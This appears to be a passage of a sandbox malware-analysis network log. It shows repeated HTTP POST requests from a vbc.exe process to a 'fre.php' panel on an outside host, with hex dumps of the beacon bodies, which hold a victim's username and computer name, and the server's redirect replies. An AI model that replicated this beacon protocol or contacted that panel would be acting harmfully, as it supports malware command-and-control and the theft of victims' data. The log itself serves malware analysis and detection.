                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:12.114135027 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.54970692.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:12.435524940 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:12.555175066 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:14.101917028 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:13 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 47ad616ea92e9e962b2d877774dc8161-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.337
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:14.101949930 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.54970792.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:14.366694927 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:14.486390114 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:16.123626947 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:15 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: ddb9fb4c0fd4fa35d2f55ef9a43c39cf-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.402
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:16.123687983 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.54970992.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:16.387166023 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:16.506905079 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:18.089358091 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:17 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: d36d9330a6a54f69d0d9b113decef6ac-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.337
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:18.089935064 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.54971592.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:18.370491982 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:18.490175009 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:20.071649075 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:19 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: fc1e178e71345c834d7dbbadbc5ac57c-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.341
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:20.071729898 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.54971692.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:20.334520102 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:20.454277039 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:22.015083075 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:21 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 3cefdacede58e13525576decebdfa376-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.335
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:22.015151024 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.54972392.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:22.293869972 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:22.413384914 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:23.904112101 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:23 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 3b95d52bdce64aada0ebd85d6709eba8-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.354
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:23.904187918 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.54973092.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:24.178985119 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:24.298559904 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:25.864224911 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:25 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: d79150d39bb0b03c13ebbd1c406101f7-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.338
